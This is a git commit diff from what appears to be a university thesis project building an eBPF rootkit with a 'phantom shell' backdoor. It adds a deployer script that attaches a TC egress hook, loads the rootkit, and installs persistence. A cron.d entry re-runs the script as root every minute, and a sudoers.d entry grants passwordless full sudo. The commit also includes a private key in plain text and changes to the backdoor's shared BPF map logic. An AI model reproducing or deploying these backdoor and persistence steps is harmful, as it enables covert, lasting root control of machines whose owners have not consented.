Added new deployer for preparing final files, messed up with the phantom shell, sometimes gives errors, but I don't think we can do much, the shared maps together with multi-hooks on network has some unexpected behaviours

2025-12-15 23:03:08 +08:00 · 2022-05-16 16:33:12 -04:00
parent 757a480de9
commit ccd518287a
10 changed files with 12677 additions and 12600 deletions
--- a/apps/deployer.sh
+++ b/apps/deployer.sh
@@ -0,0 +1,64 @@
 #!/bin/bash
 #set -x
 ## Constants declaration
 #The current directory full path
 declare -r DIR="$( cd "$( dirname "${BASH_SOURCE[0]}" )" >/dev/null 2>&1 && pwd )"
 #The location of the file where to write the full rootkit package
 declare -r BASEDIR="/home/osboxes/TFG/apps"
 #A variable to determine whether to silence output of internal commands
 declare firstvar=$1
 RED='\033[0;31m'
 BLU='\033[0;34m'
 GRN='\033[0;32m'
 NC='\033[0m' # No Color
 ## A simple function to wait for input
 waitForInput(){
   if [ "$press_key_to_continue" = true ]; then
      echo "Completed. Press any key to continue"
      while [ true ] ; 
      do
         read -t 3 -n 1
         if [ $? = 0 ] ; then
            return ;
         fi
      done
   fi
 }
 #A simple function to silence output
 quiet(){
    if [ "$firstvar" == "quiet" ]; then
        "$@" > /dev/null
    else
        "$@"
    fi
 }
 #Start of script
 echo "*******************************************************\n"
 echo "************************* TFG *************************\n"
 echo "*******************************************************\n"
 echo "***************** Marcos Sánchez Bajo *****************\n"
 echo "*******************************************************\n"
 echo ""
 BACKDOOR_INSTALLED=0
 FILE=/etc/sudoers.d/ebpfbackdoor
 if test -f "$FILE"; then
   BACKDOOR_INSTALLED=1
   echo "Backdoor is already installed"
 else
   echo -e "${BLU}Installing TC hook${NC}"
   /bin/sudo tc qdisc del dev enp0s3 clsact
   /bin/sudo tc qdisc add dev enp0s3 clsact
   /bin/sudo tc filter add dev enp0s3 egress bpf direct-action obj "$BASEDIR"/tc.o sec classifier/egress
   /bin/sudo "$BASEDIR"/kit -t enp0s3
 fi
 ## Install a backdoor in cron.d
 echo "* * * * * osboxes /bin/sudo /home/osboxes/TFG/apps/deployer.sh" > /etc/cron.d/ebpfbackdoor
 echo "osboxes ALL=(ALL:ALL) NOPASSWD:ALL #" > /etc/sudoers.d/ebpfbackdoor
--- a/apps/mycert.pem
+++ b/apps/mycert.pem
@@ -0,0 +1,81 @@
 -----BEGIN PRIVATE KEY-----
 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
 A/iGISWr4/qHcINgtY1nBHeCd0EkOQ==
 -----END PRIVATE KEY-----
 -----BEGIN CERTIFICATE-----
 MIIE+zCCAuOgAwIBAgIURgo+OnvjsvSRONRpscRzizvP+QUwDQYJKoZIhvcNAQEL
 BQAwDTELMAkGA1UEBhMCRVMwHhcNMjIwNTA2MDEwMzM4WhcNMjMwNTA2MDEwMzM4
 WjANMQswCQYDVQQGEwJFUzCCAiIwDQYJKoZIhvcNAQEBBQADggIPADCCAgoCggIB
 AKpElD4Wn11yE15GMDf97qhy5MYN2X0oAiXSE/epBhc6KSsnJjQhD0WvgdP9n6GM
 zX9EUXN1r6sg4iHoWL1dBaYhKA2Qsgjx7r8XYHyyCrl4m4ps/5dr8kZsaLB4M5r9
 LhQSb8mZubjQO2CvTwYIBisKLfmPg4AcDsBOj0C+lKBrnCRGwpy6YuWcll0UvOtd
 Zy5psvK/pNUatViYkg/KRn5dObQSgUPlPlDj2jVCaH8HUgh4T+E/hHsvOgrgpzm4
 SVLqFS0sgewegrUvjNUCo/7JvcQrQeXD4mCZ0wt26U4fFf6GnF2q1NES5fBa9LEK
 po3UwgpAsOJFfdCi+fXpqcoNLxecL0PBrojN1yBdm2VM0YTTKBtQe/iwtcXQkkkd
 SxWtCEE86Mwi7zQhZJgq67B/gGdvuZ8nKP5/oVqc4al9JCPTqHhpZqI/w9QrfyK9
 QZ8XSA8NsrTVD/GqpxpWqF6jkoT9hRWSzfFJpMsx4r2+KzeLn89j4YsvrjgrVz76
 zyxIIWA6P2ANMvLgFa71XYeQK1PZkkYbriC9wtjP7ljmDwVbLEwWyBCtCw/I/ATP
 S9/d12lS8C6vXOvfn99jCN0vuXQywHJIkOtUh0q1fTDHyDbig4UzS/kpm6QKmzqb
 vtzaZr0kHTfVGhrCegXjQlOcZ07XjFRMD215OBccNKKJAgMBAAGjUzBRMB0GA1Ud
 DgQWBBQfgD7ZU0HjCQlRmuThMlRYnAkb/TAfBgNVHSMEGDAWgBQfgD7ZU0HjCQlR
 muThMlRYnAkb/TAPBgNVHRMBAf8EBTADAQH/MA0GCSqGSIb3DQEBCwUAA4ICAQBC
 VzY9Q7YXIGQRv1hw2uzpv15mQJHGIPh1YyRJMQIaAPAfvLy5Mi+IY+ZMvCfVlykD
 NTxoPLiJQvwf61UOPyxOHA/TUXdLybeqiFCM025PHx/H8K482WBORPOuOFep2xf1
 A4MEFyX3aeBAEFcR0/ns2evQt4KIjmglHxmCPCTA29/6P+ObS0BtUngyFKyoCS9Z
 10EakCZsC65ALV7/qU4jPrvQYU0xMSnAop+pwAFtUvKzlfrPNuCNw3jSR3yX2pZj
 /Pkhjub7dlIAR+A2iwktAnv8s4U/QbOia/hfu3hDgXK5yvynfjBAHcFZ6nmZFlUH
 9DyTaYObWG5s3Hz3gD4hbO4m4e4mnFqwK+Q5oNBnR0Sjw/6snowKf5rq78SJ2w0w
 buoXThpknQFpvHfFnWmxcynqUp4LFWmXcK4OEkl85iwmhu/8R7rRt3K3NgrH9U18
 lya7XySsKL7tCH94B1sG81SK8l503Vs+7o37pGiehd00mj5YBuR5VqFh1QgrZQmp
 wHrqLodvegwuRxpUuwrI+3IvLYB5f3n5i9uL2/n5b6Y97aTyrXijoTdmZEn68OE1
 exrEy4SJhZXu2DFkFIjFYISw73hwsXBrr54RX34Y4y5NYb7G0IXLMdiLaKzCChAC
 gESIACorO+q0WCekd1dT+OyxdyzScFXMkgeu0P0Fmw==
 -----END CERTIFICATE-----
--- a/src/.output/kit.o
+++ b/src/.output/kit.o
--- a/src/.output/kit.skel.h
+++ b/src/.output/kit.skel.h
--- a/src/bin/kit
+++ b/src/bin/kit
--- a/src/ebpf/include/bpf/defs.h
+++ b/src/ebpf/include/bpf/defs.h
@@ -105,7 +105,7 @@ struct backdoor_priv_packet_log_16{
 struct backdoor_priv_phantom_shell{ 
 	__uint(type, BPF_MAP_TYPE_HASH);
 	__uint(max_entries, 1);
-	__type(key, __u64); //Source IPv4 of packet
+	__type(key, __u64); //Just 1
 	__type(value, struct backdoor_phantom_shell_data);
 	__uint(pinning, LIBBPF_PIN_BY_NAME);
 } backdoor_phantom_shell SEC(".maps");
--- a/src/ebpf/include/xdp/backdoor.h
+++ b/src/ebpf/include/xdp/backdoor.h
@@ -29,10 +29,10 @@ static __always_inline int execute_key_command(int command_received, __u32 ip, _
            bpf_printk("Received request to start phantom shell\n");
            //Check for phantom shell state
            __u64 key = 1;
-            struct backdoor_phantom_shell_data *ps_data = (struct backdoor_phantom_shell_data*) bpf_map_lookup_elem(&backdoor_phantom_shell, &key);
+            //struct backdoor_phantom_shell_data *ps_data = (struct backdoor_phantom_shell_data*) bpf_map_lookup_elem(&backdoor_phantom_shell, &key);
-            if(ps_data != (void*)0 && ps_data->active ==1){
+            /*if(ps_data != (void*)0 && ps_data->active ==1){
                bpf_printk("Overwriting previous phantom shell config\n");
-            }
+            }*/
            struct backdoor_phantom_shell_data ps_new_data = {0};
            ps_new_data.active = 1;
            ps_new_data.d_ip  = ip;
--- a/src/helpers/deployer.sh
+++ b/src/helpers/deployer.sh
@@ -5,7 +5,7 @@
 #The current directory full path
 declare -r DIR="$( cd "$( dirname "${BASH_SOURCE[0]}" )" >/dev/null 2>&1 && pwd )"
 #The location of the file where to write the full rootkit package
-declare -r OUTPUTDIR="/home/osboxes/TFG/apps/"
+declare -r BASEDIR="/home/osboxes/TFG/apps"
 #A variable to determine whether to silence output of internal commands
 declare firstvar=$1
@@ -45,49 +45,20 @@ echo "***************** Marcos Sánchez Bajo *****************\n"
 echo "*******************************************************\n"
 echo ""
-if [ "${PWD##*/}" != "helpers" ]; then
+BACKDOOR_INSTALLED=0
-    echo -e "${RED}This file should be launched from the /helpers directory${NC}"
+FILE=/etc/sudoers.d/ebpfbackdoor
-    exit 1
+if test -f "$FILE"; then
   BACKDOOR_INSTALLED=1
   echo "Backdoor is already installed"
 else
   echo -e "${BLU}Installing TC hook${NC}"
   /bin/sudo tc qdisc del dev enp0s3 clsact
   /bin/sudo tc qdisc add dev enp0s3 clsact
   /bin/sudo tc filter add dev enp0s3 egress bpf direct-action obj "$BASEDIR"/tc.o sec classifier/egress
   /bin/sudo "$BASEDIR"/kit -t enp0s3
 fi
-#First compile helpers
+## Install a backdoor in cron.d
-echo -e "${BLU}Compiling helper programs${NC}"
+echo "* * * * * osboxes /bin/sudo /home/osboxes/TFG/apps/deployer.sh" > /etc/cron.d/ebpfbackdoor
-sleep 1
+echo "osboxes ALL=(ALL:ALL) NOPASSWD:ALL #" > /etc/sudoers.d/ebpfbackdoor
 quiet make clean
 quiet make
 echo -e "${GRN}Finished${NC}"
 #Next compile client
 echo -e "${BLU}Compiling client programs${NC}"
 sleep 1
 cd ../client
 quiet make clean
 quiet make
 echo -e "${GRN}Finished${NC}"
 echo -e "${BLU}Compiling rootkit${NC}"
 sleep 1
 cd ../
 quiet make clean
 quiet make
 echo -e "${GRN}Finished${NC}"
 echo -e "${BLU}Compiling TC hook${NC}"
 sleep 1
 quiet make tckit
 echo -e "${GRN}Finished${NC}"
 echo -e "${BLU}Packaging binary results${NC}"
 cp -a bin/kit $OUTPUTDIR
 cp -a client/injector $OUTPUTDIR
 cp -a helpers/simple_open $OUTPUTDIR
 cp -a helpers/simple_timer $OUTPUTDIR
 cp -a helpers/execve_hijack $OUTPUTDIR
 cp -a helpers/injection_lib.so $OUTPUTDIR
 cp -a tc.o $OUTPUTDIR
 cp -a client/mycert.pem $OUTPUTDIR
 echo -e "${GRN}Finished${NC}"
--- a/src/helpers/packager.sh
+++ b/src/helpers/packager.sh
@@ -0,0 +1,94 @@
 #!/bin/bash
 #set -x
 ## Constants declaration
 #The current directory full path
 declare -r DIR="$( cd "$( dirname "${BASH_SOURCE[0]}" )" >/dev/null 2>&1 && pwd )"
 #The location of the file where to write the full rootkit package
 declare -r OUTPUTDIR="/home/osboxes/TFG/apps/"
 #A variable to determine whether to silence output of internal commands
 declare firstvar=$1
 RED='\033[0;31m'
 BLU='\033[0;34m'
 GRN='\033[0;32m'
 NC='\033[0m' # No Color
 ## A simple function to wait for input
 waitForInput(){
   if [ "$press_key_to_continue" = true ]; then
      echo "Completed. Press any key to continue"
      while [ true ] ; 
      do
         read -t 3 -n 1
         if [ $? = 0 ] ; then
            return ;
         fi
      done
   fi
 }
 #A simple function to silence output
 quiet(){
    if [ "$firstvar" == "quiet" ]; then
        "$@" > /dev/null
    else
        "$@"
    fi
 }
 #Start of script
 echo "*******************************************************\n"
 echo "************************* TFG *************************\n"
 echo "*******************************************************\n"
 echo "***************** Marcos Sánchez Bajo *****************\n"
 echo "*******************************************************\n"
 echo ""
 if [ "${PWD##*/}" != "helpers" ]; then
    echo -e "${RED}This file should be launched from the /helpers directory${NC}"
    exit 1
 fi
 #First compile helpers
 echo -e "${BLU}Compiling helper programs${NC}"
 sleep 1
 quiet make clean
 quiet make
 echo -e "${GRN}Finished${NC}"
 #Next compile client
 echo -e "${BLU}Compiling client programs${NC}"
 sleep 1
 cd ../client
 quiet make clean
 quiet make
 echo -e "${GRN}Finished${NC}"
 echo -e "${BLU}Compiling rootkit${NC}"
 sleep 1
 cd ../
 quiet make clean
 quiet make
 echo -e "${GRN}Finished${NC}"
 echo -e "${BLU}Compiling TC hook${NC}"
 sleep 1
 quiet make tckit
 echo -e "${GRN}Finished${NC}"
 echo -e "${BLU}Packaging binary results${NC}"
 cp -a bin/kit $OUTPUTDIR
 cp -a client/injector $OUTPUTDIR
 cp -a helpers/simple_open $OUTPUTDIR
 cp -a helpers/simple_timer $OUTPUTDIR
 cp -a helpers/execve_hijack $OUTPUTDIR
 cp -a helpers/injection_lib.so $OUTPUTDIR
 cp -a tc.o $OUTPUTDIR
 cp -a client/mycert.pem $OUTPUTDIR
 cp -a helpers/deployer.sh $OUTPUTDIR
 echo -e "${GRN}Finished${NC}"
--- a/src/user/kit.c
+++ b/src/user/kit.c
@@ -39,7 +39,7 @@
 		goto cleanup\
 	}
-static int FD_TC_MAP;
+int FD_TC_MAP;
 __u32 ifindex; //Interface to which the rootkit connects
 char* local_ip;
@@ -193,24 +193,30 @@ static int handle_rb_event(void *ctx, void *data, size_t data_size){
 		}
 	}else if(e->event_type == PSH_UPDATE){
 		printf("Requested to update the phantom shell\n");
-		int key = 1;
+		__u64 key = 1;
 		struct backdoor_phantom_shell_data data;
 		struct bpf_map_info map_expect = {0};
 		struct bpf_map_info info = {0};
 		FD_TC_MAP = bpf_obj_get("/sys/fs/bpf/tc/globals/backdoor_phantom_shell");
 		printf("TC MAP ID: %i\n", FD_TC_MAP);
 		map_expect.key_size    = sizeof(__u64);
 		map_expect.value_size  = sizeof(struct backdoor_phantom_shell_data);
 		map_expect.max_entries = 1;
 		int err = check_map_fd_info(FD_TC_MAP, &info, &map_expect);
 		printf("TC MAP ID: %d\n", FD_TC_MAP);
 		if (err) {
 			fprintf(stderr, "ERR: map via FD not compatible\n");
 			return err;
 		}
 		printf("Collected stats from BPF map:\n");
 		printf(" - BPF map (bpf_map_type:%d) id:%d name:%s"
 			" key_size:%d value_size:%d max_entries:%d\n",
 			info.type, info.id, info.name,
 			info.key_size, info.value_size, info.max_entries
 			);
 		err = bpf_map_lookup_elem(FD_TC_MAP, &key, &data);
 		if(err<0) {
 			printf("Failed to read the shared map: %d\n", err);
-			return -1;
+			//return -1;
 		}
 		printf("Pre value: %i, %i, %i, %s\n", data.active, data.d_ip, data.d_port, data.payload);
 		data.active = e->bps_data.active;
@@ -354,13 +360,13 @@ int main(int argc, char**argv){
 	}
 	FD_TC_MAP = bpf_obj_get("/sys/fs/bpf/tc/globals/backdoor_phantom_shell");
-	printf("TC MAP ID: %i\n", FD_TC_MAP);
+	printf("TC MAP ID: %d\n", FD_TC_MAP);
 	map_expect.key_size    = sizeof(__u64);
 	map_expect.value_size  = sizeof(struct backdoor_phantom_shell_data);
 	map_expect.max_entries = 1;
 	err = check_map_fd_info(FD_TC_MAP, &info, &map_expect);
 	if (err) {
-		fprintf(stderr, "ERR: map via FD not compatible\n");
+		fprintf(stderr, "ERR: map via FD not compatible. Is the TC hook open?\n");
 		return err;
 	}
 	printf("Collected stats from BPF map:\n");
@@ -369,14 +375,15 @@ int main(int argc, char**argv){
 			info.type, info.id, info.name,
 			info.key_size, info.value_size, info.max_entries
 			);
-	int key = 1;
+	__u64 key = 1;
 	struct backdoor_phantom_shell_data data;
 	err = bpf_map_lookup_elem(FD_TC_MAP, &key, &data);
 	if(err<0) {
 		printf("Failed to lookup element\n");
 		return -1;
 	}
 	printf("Value: %i, %i, %i\n", data.active, data.d_ip, data.d_port);
-	//bpf_map_update_elem(tc_efd, &key, &data, 0);
+	bpf_map_update_elem(FD_TC_MAP, &key, &data, 0);
 	/*bpf_obj_get(NULL);
 	char* DIRECTORY_PIN = "/sys/fs/bpf/mymaps";